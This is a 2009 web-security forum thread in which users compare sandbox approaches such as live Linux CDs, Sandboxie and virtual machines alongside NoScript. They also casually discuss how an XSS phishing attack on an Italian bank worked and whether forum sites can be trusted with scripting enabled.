Tell me what you think about "sandbox" solutions

General discussion about web technology.
Nan M
Ambassador
Posts: 102
Joined: Thu Mar 19, 2009 12:44 pm

Re: Tell me what you think about "sandbox" solutions

Post by Nan M » Sat Mar 28, 2009 3:20 am

For the plain home user who may be browsing the forum, a session with one of the live Linux distro cds is a good sandbox - and it doesn't take up resources in your main system, or need geek credentials to set up.
Nothing is written to the machine's resident system, so rebooting after removing the live cd leaves no trace of the cd session.

At home here, rather than fuss around with creating and maintaining limited user accounts for them, I give the very young children who visit a session in The Puppy http://www.puppylinux.org/home/overview with a tied-down Seamonkey to play with. Their sessions reside entirely in ram and can be run on that old machine out the back with the sticky hdd that won't matter if it gets food down the fan vent - residual current detectors in place of course.
The older visitors have a choice of live cds from distros such as OpenSUSE and Ubuntu.
These are much easier solutions for a busy auntie than creating and policing limited user accounts on the main systems, and it does give the older kids freedom to download as they want. Which they will always try to do against any restrictions, so I can avoid the cleanups this way.
Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20

User avatar
GµårÐïåñ
Lieutenant Colonel
Posts: 3339
Joined: Fri Mar 20, 2009 5:19 am
Location: PST - USA
Contact:

Re: Tell me what you think about "sandbox" solutions

Post by GµårÐïåñ » Sat Mar 28, 2009 3:43 am

Nan M wrote:For the plain home user who may be browsing the forum, a session with one of the live Linux distro cds is a good sandbox - and it doesn't take up resources in your main system, or need geek credentials to set up.
Nothing is written to the machine's resident system, so rebooting after removing the live cd leaves no trace of the cd session.


Yes, for me Knoppix has been great for this and you can even write to external disks if you wish.

At home here, rather than fuss around with creating and maintaining limited user accounts for them, I give the very young children who visit a session in The Puppy http://www.puppylinux.org/home/overview with a tied-down Seamonkey to play with. Their sessions reside entirely in ram and can be run on that old machine out the back with the sticky hdd that won't matter if it gets food down the fan vent - residual current detectors in place of course.
The older visitors have a choice of live cds from distros such as OpenSUSE and Ubuntu.
These are much easier solutions for a busy auntie than creating and policing limited user accounts on the main systems, and it does give the older kids freedom to download as they want. Which they will always try to do against any restrictions, so I can avoid the cleanups this way.


Nice, creative solution for kids but unfortunately for me, I deal with adults, although sometimes they are much worse than kids.
~.:[ Lï£ê ï§ å Lêmðñ åñÐ Ì Wåñ† M¥ Mðñê¥ ßå¢k ]:.~
________________ .: [ Major Mike's ] :. ________________
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8

Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Tell me what you think about "sandbox" solutions

Post by Tom T. » Sat Mar 28, 2009 9:38 am

Giorgio Maone wrote:NoScript (in-browser protection, web app isolation) and sandboxes (browser isolation from the OS) are orthogonal.

Yes, nice complementary right angles, producing defense in depth, or the ability to view a Flash video without fear inside SB. You pwned my sandbox? I just flushed you down the toilet!
Giorgio Maone wrote:I wrote a short post about this some time ago.

I went there. The link to the bank phishing, which did sound scary, is broken. Do you have an updated link?
The "pwn your router" attack still seems impossible with full NS lockdown, as your conclusion said. We're on the same side there.
Giorgio Maone wrote:If I need to test something in IE or Chrome, I use a clean Vista VM. For Safari, a Mac OS X VM.

Tom T. wrote: ... lightweight, low-knowledge solutions (unlike VMware, etc.).
My understanding - please correct me if I'm wrong -- is that VM solutions consume a lot of resources -- essentially running almost a second machine or second OS - and so might not be suitable for those of us who buy at the lower end of the computer scale. Also more knowledge to set up and use, which would apply to Linux, Knoppix, and other solutions mentioned here. I readily admit to being probably the lowest-knowledge user among the frequent posters here, at least as regards coding, programming, etc. (although I've pulled some kinda clever hacks on my own XP :geek: ) But I read a lot, try to learn and remember and expand the knowledge base. I hope to know more next week than I do during the current week. Otherwise, I will be this stupid for the rest of my life. :cry: Anyway, perhaps this helps me to empathize with the average user. Hence my efforts to initiate a Quick Start Beginner Guide to NS, and to promote products like Sandboxie (and NS, of course!) that are ready to use OOB with little or no config, little user interaction, short, quick learning curve. Safety for the masses.

Giorgio Maone wrote:I've heard good things about SandboxIE among my users, but I've never felt the need of trying it out, sorry.

No need to apologize. You are a thousand times as knowledgeable as I and can detect dangers on your own from source code, etc. Steve Gibson, despite preaching security to the masses, admits that he doesn't run AV. Sure, he can smell a virus a mile away. I can read the page source code and pick out a few things, but wouldn't know an XSS or a virus code if I tripped over it. So I trust you and NS to protect me from unsafe scripts, plugins, XSS, clickjack, etc.; I use AV to do individual scans of all d/l's before opening as well as for real-time protection; and I use SB as a backup defense or when scripts/plugins must be allowed, knowing that if some malware does sneak into the sandbox, it cannot write to my Registry, system files, or, for that matter, to my grocery list or to anything else outside the sandbox; and that it is gone forever as soon as the browser is closed.

I know that it can be difficult for experts in any field to empathize with novices. I know this because in the several fields in which I have been paid to teach others, I had a high success rate, <bragging> often higher than the other teachers, some of whom would send me their "failures"</bragging>, by empathizing with the beginner, seeing it from *their* POV rather than mine, and assuming zero-knowledge until demonstrated otherwise.

I'm very grateful to the sw experts who share their tools with me, and, to the extent that I can absorb it, their knowledge. Cheers!

p. s. Since I use NS to block dangerous scripting at user-content sites like this one :P, I discovered just this week a work-around to use the less-commonly-known smileys without enabling the dangerous scripts. Right-click the smiley (sometimes several times, it seems), > Properties, and read "Alternate text". :idea: Then you can type in that text and have the smiley without the scripting. So I know more than I did last week. But of course, all of you have known this trick for years. ;)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20

User avatar
therube
Ambassador
Posts: 7406
Joined: Thu Mar 19, 2009 4:17 pm
Location: Maryland USA

Re: Tell me what you think about "sandbox" solutions

Post by therube » Sat Mar 28, 2009 2:31 pm

The link to the bank phishing, which did sound scary, is broken.

LINK: XSS+phishing in Italian bank hack

And a quicker link to your QUICK START, http://forums.mozillazine.org/viewtopic ... 5#p6006015.

PS: on the "by" line, that little box, that is a direct link to the post. That's what I used for the (second) link above. (Mozillazine also included a session id &sid=xxx, which is immaterial & I edited out.)

Code: Select all

Post by therube » Sat Mar 28, 2009 9:31 am
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090327 SeaMonkey/2.0b1pre

Alan Baxter
Ambassador
Posts: 1586
Joined: Fri Mar 20, 2009 4:47 am
Location: Colorado, USA

Re: Tell me what you think about "sandbox" solutions

Post by Alan Baxter » Sat Mar 28, 2009 10:29 pm

Tom T. wrote:I use NS to block dangerous scripting at user-content sites like this one

As far as I know, it's not necessary to block scripting on this site. User content implemented with html isn't allowed.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8

User avatar
GµårÐïåñ
Lieutenant Colonel
Posts: 3339
Joined: Fri Mar 20, 2009 5:19 am
Location: PST - USA
Contact:

Re: Tell me what you think about "sandbox" solutions

Post by GµårÐïåñ » Sun Mar 29, 2009 12:39 am

Alan Baxter wrote:
Tom T. wrote:I use NS to block dangerous scripting at user-content sites like this one

As far as I know, it's not necessary to block scripting on this site. User content implemented with html isn't allowed.


Agreed, you are fine here. And even elsewhere, certain things are quite benign.
~.:[ Lï£ê ï§ å Lêmðñ åñÐ Ì Wåñ† M¥ Mðñê¥ ßå¢k ]:.~
________________ .: [ Major Mike's ] :. ________________
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8

Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Tell me what you think about "sandbox" solutions

Post by Tom T. » Sun Mar 29, 2009 3:13 am

therube wrote:
The link to the bank phishing, which did sound scary, is broken.

LINK: XSS+phishing in Italian bank hack

Thanks.
"An extremely convincing phishing attack is using a cross-site scripting vulnerability on an Italian Bank's own website to attempt to steal customers' bank account details. Fraudsters are currently sending phishing mails which use a specially-crafted URL to inject a modified login form onto the bank's login page."
Are they sending the mails to the customers, or to the bank? If to the bank, shame on them for having XSS vuln, but much more shame for opening emails without proper sanitization of content and a little common sense. The two banks I deal with in the US both have secure messaging systems inside the logged-in account, so there is no need for a customer *ever* to send the bank an email through normal channels (just as users are constantly warned never to click on a link in email purporting to be from your bank.) It seems inquiries from potential customers could be sanitized. Or opened in a Sandboxed browser :)

And a quicker link to your QUICK START, http://forums.mozillazine.org/viewtopic ... 5#p6006015.

I *knew* there had to be a direct link to a specific post instead of to a page. I just copied the URL of the page :? . How stupid of me not to realize that that unlabeled, tiny little clear box, which looks almost like a web bug (yes, sometimes they're slightly opaque), was the direct link. (btw, I see only a date/time stamp, not "by", but I found it eventually, d'uh). Also much thanks for tip to cut sid. Now I know more than I did last week, so I can kick back for a week lol.

@ Alan Baxter and GµårÐïåñ:

Do you know of an emoticon (smiley) for "facetious"? Obviously the one I chose didn't convey that successfully. Perhaps "wink" would have been a better choice.
Anyway, I still enjoy figuring out stuff like the smiley work-around (perhaps one day, I'll be at a site that isn't so benign), and yes, I do allow scripting here most of the time, disabling it only for Alan's pm's. Image
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20

Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Clarification of Sandboxie/NoScript relationship

Post by Tom T. » Sun Mar 29, 2009 3:25 am

Tom T. wrote:
Giorgio Maone wrote:NoScript (in-browser protection, web app isolation) and sandboxes (browser isolation from the OS) are orthogonal.

I've had a nagging fear that Giorgio or anyone else might somehow have gotten the impression that I was touting Sandboxie as a substitute or competition for NS. For one, that would be incredibly rude to our host and to this forum -- utter spam, actually. (please note SB is available free as nagware.) For another, why would I then be here, so enthusiastic about NS?
Yes, they are two completely different avenues towards the goal of safe surf. Putting a second lock on your door that is identical to the first lock wouldn't add much safety. Adding a slide bolt would. SB isn't competing or conflicting with NS; it's just the poor man's version of VM, light and easy to use.

I hope neither Giorgio nor anyone else got the wrong idea. Apologies to those who did.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20

User avatar
GµårÐïåñ
Lieutenant Colonel
Posts: 3339
Joined: Fri Mar 20, 2009 5:19 am
Location: PST - USA
Contact:

Re: Tell me what you think about "sandbox" solutions

Post by GµårÐïåñ » Sun Mar 29, 2009 3:42 am

Tom, here is my take on stuff and what you said. I hope I got it all right. You are right that the user needs to use some common sense and not use a link provided in the email directly without knowing for sure where it goes. But if say they are stupid and they do it, a sandboxed browser will NOT help them as its not stealing information actively but rather passively asking the user to provide it, no way to block some bonehead move like that when the user is providing it willingly basically.

I don't think anyone, including Giorgio, has anything against sandboxed solutions or how people use them, just that each does it in their own way. He does it using VM solutions or linux environments with less exploits, I use VM, live linux, and even some sandbox solution for various purposes of developing, testing, security or whatever but not every day or for myself necessarily because I feel that with my use of common sense and careful practices, I am just fine. Knock on wood, no problems all these years, no matter the threats released out there.

I am just always on the look out for other ways of doing things, other solutions, other perspectives and so on because I love to acquire knowledge for the sake of knowledge sometimes, call it pure research if you will. I have always believed that knowledge is power and why not share that power. Some of it I use personally and incorporate, some of it I pass along to others and some of it just sits in the noggin and collects cobwebs :) Of course I didn't mean to say that you won't find a site that is malicious, I am just saying that this site and some site are benign, not everyone is out there to get us ;) Sometimes a cigar is just a cigar :lol: But its good to be prepared for the worse and I always recommend caution, no matter what. After all, its not paranoia, when everyone IS out to get you :twisted:
~.:[ Lï£ê ï§ å Lêmðñ åñÐ Ì Wåñ† M¥ Mðñê¥ ßå¢k ]:.~
________________ .: [ Major Mike's ] :. ________________
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8

Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Tell me what you think about "sandbox" solutions

Post by Tom T. » Sun Mar 29, 2009 6:36 am

GµårÐïåñ wrote:Tom, here is my take on stuff and what you said. I hope I got it all right. You are right that the user needs to use some common sense and not use a link provided in the email directly without knowing for sure where it goes. But if say they are stupid and they do it, a sandboxed browser will NOT help them as its not stealing information actively but rather passively asking the user to provide it, no way to block some bonehead move like that when the user is providing it willingly basically.

GµårÐïåñ", my good friend, I'm afraid that once again I've been unclear by addressing multiple topics in a single post, a habit I *must* learn to break.

On page 1 of this thread, Giorgio linked to an article of his, which in turn linked to an XSS attack on an Italian bank. I found the link to be broken, so therube kindly provided an updated link. Quoting the actual article,
"An extremely convincing phishing attack is using a cross-site scripting vulnerability on an Italian Bank's own website to attempt to steal customers' bank account details. Fraudsters are currently sending phishing mails which use a specially-crafted URL to inject a modified login form onto the bank's login page."

Now, my question was how sending an email to the bank could cause XSS. For example, go to http://www.wachovia.com, pretending you are a non-customer, and follow the contact links until you find the way to send them a message. If you don't have the time, I'll tell you where you'll end up:

(scroll down)


https://www.wachovia.com/formswachovia/ ... ic_contact

Note that they don't even provide a normal internet email address, e. g., "info@wachovia.com". They direct you to their *own* internal messager, under their control, and hopefully designed by someone like you or Giorgio instead of the usual idiots. Sure, BadGuy could make up fake name/email, although I'd expect the bank's bot to make sure the email is a valid one (even if just to check for typos) and return error if not. If you do get to submit, then certainly you could write malicious code in the box and send it. But I can't see their message-receiving program having access to modify (inject XSS code into) their *secure login page* directly from a form submission, unless they're really stupid, and hopefully by now, everyone knows such inputs should be sanitized. For example, my bank prohibits all keyboard characters in such internal messages except for a very limited set, presumably safe. They don't even allow standard double-quotes " , hyphens - or asterisks * (I assume these are parsing syntax in some languages, most likely SQL?).

If a bank *did* have a standard external mail address, it still seems difficult for me to understand how the email itself could modify the secure login page, although one of my online banks got really pi**ed when I told them to quit sending me HTML-enriched email and stick to plain text. But I don't have a secure login page for them to attack anyway :). So assume the foolish employee clicks the malicious link in this email. First, let us hope s/he is not answering email with admin or root privileges on the bank's entire IT system :o . But my point, and I'm sorry it wasn't clear, is that if the bank permits outside emails, and employees sit there with Windows machines answering them from a sandboxed browser, then any malicious code, even if through a foolish click on a link, is stuck in the sandbox. Right, it is only gathering information. But this attack specifically stated that "...use a specially-crafted URL to inject a modified login form onto the bank's login page." I can't visualize this URL or its payload getting out of the sandboxed email-browser and into the source code of the https login page of the bank. Please explain if/how this is possible. Thanks as usual, my friend.

I'm always afraid that if the post is short, I'm not being clear; or if it's too long, it's boring or hard to understand . Please forgive both.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20

User avatar
GµårÐïåñ
Lieutenant Colonel
Posts: 3339
Joined: Fri Mar 20, 2009 5:19 am
Location: PST - USA
Contact:

Re: Tell me what you think about "sandbox" solutions

Post by GµårÐïåñ » Sun Mar 29, 2009 6:59 am

I am sorry Tom, I did understand what you were saying, I just tried to keep my response short and to the point and it seems I failed miserably :lol: Alot of domain hijacking, like what happened with dfs.dell.com not too long ago is that someone finds a vulnerability in the way their site processes information and finds a way to send a seemingly legitimate link to facilitate an injection that will redirect that information to the "BadGuy" server for harvesting.

I think the best person to do further response on this would be Giorgio himself, as he has a way of explaining things that tend to do the trick. Most common way of "phishing" is "BadGuy" use link that says xyz.com (legitimate domain) the actual embedded link is to xyz.badguyserver.com (not legitimate) and the users don't catch it in the address bar. Another is to send a link to the legitimate domain xyz.com with a parameter ?badinfo=XXX&inject=redirectcrap or something to that effect which allows them to actually intercept the legitimate sites credential submission and processing and direct it to another site. Later they use that to log in, and do their stuff.

Anyway bud, I am running on about 38 hours of no sleep, no coffee, no breaks and my brain is totally fried, so I will bid you all goodnight as I go attempt to get a few hours before being up again at 6:30 AM. It is now officially midnight :( Hopefully I made some good clarifications and not just muddy the water more.
~.:[ Lï£ê ï§ å Lêmðñ åñÐ Ì Wåñ† M¥ Mðñê¥ ßå¢k ]:.~
________________ .: [ Major Mike's ] :. ________________
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8

Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Tell me what you think about "sandbox" solutions

Post by Tom T. » Sun Mar 29, 2009 10:03 am

Get some sleep, Bro. The issue was they were sending the phishing mail TO A BANK, not a user. When you're well-refreshed, I'm sure you'll understand my question and have your usual excellent answer. No rush or need to bother Giorgio -- it was an academic question for my own continuing education, since I'm not a bank. ;)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20

User avatar
therube
Ambassador
Posts: 7406
Joined: Thu Mar 19, 2009 4:17 pm
Location: Maryland USA

Re: Tell me what you think about "sandbox" solutions

Post by therube » Sun Mar 29, 2009 5:26 pm

(Perhaps taken out of context, but ...)

As far as I know, it's not necessary to block scripting on this site.
...
you are fine here
...
just saying that this site and some site are benign


I'll disagree.
This site & some sites intend on being benign.
But that does not make them so.

Mozillazine had (has?) an exploit against it.
There is nothing to say that this site does not, or may not in the future.

So blankly accepting some site IMO is wrong.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090327 SeaMonkey/2.0b1pre

Alan Baxter
Ambassador
Posts: 1586
Joined: Fri Mar 20, 2009 4:47 am
Location: Colorado, USA

Re: Tell me what you think about "sandbox" solutions

Post by Alan Baxter » Sun Mar 29, 2009 8:27 pm

therube wrote:This site & some sites intend on being benign.
But that does not make them so.

Mozillazine had (has?) an exploit against it.
There is nothing to say that this site does not, or may not in the future.

So blankly accepting some site IMO is wrong.

Are you saying this site has a known vulnerability? (I don't mean known exploit. That would be much more serious.) If that's the case, then certainly Giorgio should be warned about using JavaScript to implement some of its features. I don't like enabling JavaScript on sites with known vulnerabilities. Should he run one of those web site checkers to verify it's not vulnerable?

Same with the MozillaZine forums. If its current implementation of phpBB has a known exploit, please let the rest of us know exactly what it is, so we can take appropriate precautions.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8

User avatar
GµårÐïåñ
Lieutenant Colonel
Posts: 3339
Joined: Fri Mar 20, 2009 5:19 am
Location: PST - USA
Contact:

Re: Tell me what you think about "sandbox" solutions

Post by GµårÐïåñ » Mon Mar 30, 2009 12:40 am

When I said this site is benign and some others too, I was asserting the obvious fact that they are intentionally and in good faith choosing to be as to not harm their users. Anytime you use a technology, even as simple as getting a hosting service on shared virtual server, you are ALWAYS potentially exposed to exploits. That's a given and goes without surprise or much discussion really. All a person can do is be diligent, cautious and use common sense.

Tom, I wish I could say I got some sleep but had too much on my mind and if you can believe it, I was too exhausted to sleep. I ended up getting up at 5, taking a shower, get dressed and sit there with a cup of coffee reading over my prep and then I got home just a couple of hours ago, I am so fried still. Plus starting tomorrow, it is going to one HECK of a killer month for me. I am going to re-read Giorgio's post, re-read my own stuff and your stuff and compose my thoughts offline until it makes sense to me and then post it, how is that ? :P
~.:[ Lï£ê ï§ å Lêmðñ åñÐ Ì Wåñ† M¥ Mðñê¥ ßå¢k ]:.~
________________ .: [ Major Mike's ] :. ________________
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8

Post Reply